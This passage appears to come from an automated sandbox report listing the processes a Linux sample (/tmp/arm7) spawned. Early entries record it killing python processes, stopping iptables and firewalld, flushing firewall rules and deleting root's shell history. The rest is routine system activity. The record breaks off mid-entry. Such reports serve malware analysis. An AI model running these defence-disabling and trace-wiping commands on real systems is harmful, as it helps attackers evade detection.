                                Start date:11/11/2021
                                Path:/usr/bin/pkill
                                Arguments:pkill -9 python
                                File size:30968 bytes
                                MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                General

                                Start time:03:08:28
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:28
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:/bin/sh -c "service iptables stop"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:28
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:28
                                Start date:11/11/2021
                                Path:/usr/sbin/service
                                Arguments:service iptables stop
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:28
                                Start date:11/11/2021
                                Path:/usr/sbin/service
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:28
                                Start date:11/11/2021
                                Path:/usr/bin/basename
                                Arguments:basename /usr/sbin/service
                                File size:39256 bytes
                                MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                General

                                Start time:03:08:28
                                Start date:11/11/2021
                                Path:/usr/sbin/service
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:28
                                Start date:11/11/2021
                                Path:/usr/bin/basename
                                Arguments:basename /usr/sbin/service
                                File size:39256 bytes
                                MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                General

                                Start time:03:08:28
                                Start date:11/11/2021
                                Path:/usr/sbin/service
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:28
                                Start date:11/11/2021
                                Path:/usr/bin/systemctl
                                Arguments:systemctl --quiet is-active multi-user.target
                                File size:996584 bytes
                                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                General

                                Start time:03:08:29
                                Start date:11/11/2021
                                Path:/usr/sbin/service
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:29
                                Start date:11/11/2021
                                Path:/usr/sbin/service
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:29
                                Start date:11/11/2021
                                Path:/usr/bin/systemctl
                                Arguments:systemctl list-unit-files --full --type=socket
                                File size:996584 bytes
                                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                General

                                Start time:03:08:29
                                Start date:11/11/2021
                                Path:/usr/sbin/service
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:29
                                Start date:11/11/2021
                                Path:/usr/bin/sed
                                Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
                                File size:121288 bytes
                                MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/usr/bin/systemctl
                                Arguments:systemctl stop iptables.service
                                File size:996584 bytes
                                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:/bin/sh -c "/sbin/iptables -F; /sbin/iptables -X"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/sbin/iptables
                                Arguments:/sbin/iptables -F
                                File size:99296 bytes
                                MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/sbin/iptables
                                Arguments:/sbin/iptables -X
                                File size:99296 bytes
                                MD5 hash:1ab05fef765b6342cdfadaa5275b33af

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:/bin/sh -c "service firewalld stop"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/usr/sbin/service
                                Arguments:service firewalld stop
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/usr/sbin/service
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/usr/bin/basename
                                Arguments:basename /usr/sbin/service
                                File size:39256 bytes
                                MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/usr/sbin/service
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/usr/bin/basename
                                Arguments:basename /usr/sbin/service
                                File size:39256 bytes
                                MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/usr/sbin/service
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/usr/bin/systemctl
                                Arguments:systemctl --quiet is-active multi-user.target
                                File size:996584 bytes
                                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/usr/sbin/service
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/usr/sbin/service
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/usr/bin/systemctl
                                Arguments:systemctl list-unit-files --full --type=socket
                                File size:996584 bytes
                                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/usr/sbin/service
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:32
                                Start date:11/11/2021
                                Path:/usr/bin/sed
                                Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
                                File size:121288 bytes
                                MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                General

                                Start time:03:08:36
                                Start date:11/11/2021
                                Path:/usr/bin/systemctl
                                Arguments:systemctl stop firewalld.service
                                File size:996584 bytes
                                MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                General

                                Start time:03:08:36
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:36
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:/bin/sh -c "rm -rf ~/.bash_history"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:36
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:36
                                Start date:11/11/2021
                                Path:/usr/bin/rm
                                Arguments:rm -rf /root/.bash_history
                                File size:72056 bytes
                                MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                General

                                Start time:03:08:36
                                Start date:11/11/2021
                                Path:/tmp/arm7
                                Arguments:n/a
                                File size:4956856 bytes
                                MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                General

                                Start time:03:08:36
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:/bin/sh -c "history -c"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:08:55
                                Start date:11/11/2021
                                Path:/usr/lib/systemd/systemd
                                Arguments:n/a
                                File size:1620224 bytes
                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                General

                                Start time:03:08:55
                                Start date:11/11/2021
                                Path:/usr/bin/whoopsie
                                Arguments:/usr/bin/whoopsie -f
                                File size:68592 bytes
                                MD5 hash:d3a6915d0e7398fb4c89a037c13959c8

                                General

                                Start time:03:08:59
                                Start date:11/11/2021
                                Path:/usr/lib/systemd/systemd
                                Arguments:n/a
                                File size:1620224 bytes
                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                General

                                Start time:03:08:59
                                Start date:11/11/2021
                                Path:/usr/sbin/sshd
                                Arguments:/usr/sbin/sshd -t
                                File size:876328 bytes
                                MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340

                                General

                                Start time:03:08:59
                                Start date:11/11/2021
                                Path:/usr/lib/systemd/systemd
                                Arguments:n/a
                                File size:1620224 bytes
                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                General

                                Start time:03:08:59
                                Start date:11/11/2021
                                Path:/usr/sbin/sshd
                                Arguments:/usr/sbin/sshd -D
                                File size:876328 bytes
                                MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340

                                General

                                Start time:03:09:06
                                Start date:11/11/2021
                                Path:/usr/sbin/gdm3
                                Arguments:n/a
                                File size:453296 bytes
                                MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                General

                                Start time:03:09:06
                                Start date:11/11/2021
                                Path:/etc/gdm3/PrimeOff/Default
                                Arguments:/etc/gdm3/PrimeOff/Default
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:09:06
                                Start date:11/11/2021
                                Path:/usr/sbin/gdm3
                                Arguments:n/a
                                File size:453296 bytes
                                MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                General

                                Start time:03:09:06
                                Start date:11/11/2021
                                Path:/etc/gdm3/PrimeOff/Default
                                Arguments:/etc/gdm3/PrimeOff/Default
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:09:06
                                Start date:11/11/2021
                                Path:/usr/lib/systemd/systemd
                                Arguments:n/a
                                File size:1620224 bytes
                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                General

                                Start time:03:09:06
                                Start date:11/11/2021
                                Path:/usr/lib/accountsservice/accounts-daemon
                                Arguments:/usr/lib/accountsservice/accounts-daemon
                                File size:203192 bytes
                                MD5 hash:01a899e3fb5e7e434bea1290255a1f30

                                General

                                Start time:03:09:28
                                Start date:11/11/2021
                                Path:/usr/lib/systemd/systemd
                                Arguments:n/a
                                File size:1620224 bytes
                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                General

                                Start time:03:09:28
                                Start date:11/11/2021
                                Path:/usr/bin/pulseaudio
                                Arguments:/usr/bin/pulseaudio --daemonize=no --log-target=journal
                                File size:100832 bytes
                                MD5 hash:0c3b4c789d8ffb12b25507f27e14c186

                                General

                                Start time:03:09:32
                                Start date:11/11/2021
                                Path:/usr/lib/systemd/systemd
                                Arguments:n/a
                                File size:1620224 bytes
                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                General

                                Start time:03:09:32
                                Start date:11/11/2021
                                Path:/usr/bin/gpu-manager
                                Arguments:/usr/bin/gpu-manager --log /var/log/gpu-manager.log
                                File size:76616 bytes
                                MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                General

                                Start time:03:09:32
                                Start date:11/11/2021
                                Path:/usr/bin/gpu-manager
                                Arguments:n/a
                                File size:76616 bytes
                                MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                General

                                Start time:03:09:32
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:09:32
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:09:32
                                Start date:11/11/2021
                                Path:/usr/bin/grep
                                Arguments:grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
                                File size:199136 bytes
                                MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                General

                                Start time:03:09:32
                                Start date:11/11/2021
                                Path:/usr/bin/gpu-manager
                                Arguments:n/a
                                File size:76616 bytes
                                MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                General

                                Start time:03:09:32
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/usr/bin/grep
                                Arguments:grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
                                File size:199136 bytes
                                MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/usr/bin/gpu-manager
                                Arguments:n/a
                                File size:76616 bytes
                                MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/usr/bin/grep
                                Arguments:grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
                                File size:199136 bytes
                                MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/usr/bin/gpu-manager
                                Arguments:n/a
                                File size:76616 bytes
                                MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/usr/bin/grep
                                Arguments:grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
                                File size:199136 bytes
                                MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/usr/bin/gpu-manager
                                Arguments:n/a
                                File size:76616 bytes
                                MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/usr/bin/grep
                                Arguments:grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
                                File size:199136 bytes
                                MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/usr/bin/gpu-manager
                                Arguments:n/a
                                File size:76616 bytes
                                MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/usr/bin/grep
                                Arguments:grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
                                File size:199136 bytes
                                MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/usr/bin/gpu-manager
                                Arguments:n/a
                                File size:76616 bytes
                                MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/usr/bin/grep
                                Arguments:grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
                                File size:199136 bytes
                                MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/usr/bin/gpu-manager
                                Arguments:n/a
                                File size:76616 bytes
                                MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/usr/bin/grep
                                Arguments:grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
                                File size:199136 bytes
                                MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/usr/lib/systemd/systemd
                                Arguments:n/a
                                File size:1620224 bytes
                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/usr/share/gdm/generate-config
                                Arguments:/usr/share/gdm/generate-config
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/usr/share/gdm/generate-config
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:09:33
                                Start date:11/11/2021
                                Path:/usr/bin/pkill
                                Arguments:pkill --signal HUP --uid gdm dconf-service
                                File size:30968 bytes
                                MD5 hash:fa96a75a08109d8842e4865b2907d51f

                                General

                                Start time:03:09:35
                                Start date:11/11/2021
                                Path:/usr/lib/systemd/systemd
                                Arguments:n/a
                                File size:1620224 bytes
                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                General

                                Start time:03:09:35
                                Start date:11/11/2021
                                Path:/usr/lib/gdm3/gdm-wait-for-drm
                                Arguments:/usr/lib/gdm3/gdm-wait-for-drm
                                File size:14640 bytes
                                MD5 hash:82043ba752c6930b4e6aaea2f7747545

                                General

                                Start time:03:09:41
                                Start date:11/11/2021
                                Path:/usr/libexec/gvfsd-fuse
                                Arguments:n/a
                                File size:47632 bytes
                                MD5 hash:d18fbf1cbf8eb57b17fac48b7b4be933

                                General

                                Start time:03:09:41
                                Start date:11/11/2021
                                Path:/bin/fusermount
                                Arguments:fusermount -u -q -z -- /run/user/1000/gvfs
                                File size:39144 bytes
                                MD5 hash:576a1b135c82bdcbc97a91acea900566

                                General

                                Start time:03:09:44
                                Start date:11/11/2021
                                Path:/usr/lib/systemd/systemd
                                Arguments:n/a
                                File size:1620224 bytes
                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                General

                                Start time:03:09:44
                                Start date:11/11/2021
                                Path:/lib/systemd/systemd-user-runtime-dir
                                Arguments:/lib/systemd/systemd-user-runtime-dir stop 1000
                                File size:22672 bytes
                                MD5 hash:d55f4b0847f88131dbcfb07435178e54

                                General

                                Start time:03:09:45
                                Start date:11/11/2021
                                Path:/usr/lib/systemd/systemd
                                Arguments:n/a
                                File size:1620224 bytes
                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                General

                                Start time:03:09:45
                                Start date:11/11/2021
                                Path:/usr/sbin/gdm3
                                Arguments:/usr/sbin/gdm3
                                File size:453296 bytes
                                MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/usr/lib/systemd/systemd
                                Arguments:n/a
                                File size:1620224 bytes
                                MD5 hash:9b2bec7092a40488108543f9334aab75

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/usr/bin/gpu-manager
                                Arguments:/usr/bin/gpu-manager --log /var/log/gpu-manager.log
                                File size:76616 bytes
                                MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/usr/bin/gpu-manager
                                Arguments:n/a
                                File size:76616 bytes
                                MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/usr/bin/grep
                                Arguments:grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
                                File size:199136 bytes
                                MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/usr/bin/gpu-manager
                                Arguments:n/a
                                File size:76616 bytes
                                MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/usr/bin/grep
                                Arguments:grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
                                File size:199136 bytes
                                MD5 hash:1e6ebb9dd094f774478f72727bdba0f5

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/usr/bin/gpu-manager
                                Arguments:n/a
                                File size:76616 bytes
                                MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:11:17
                                Start date:11/11/2021
                                Path:/bin/sh
                                Arguments:n/a
                                File size:129816 bytes
                                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                General

                                Start time:03:11:17
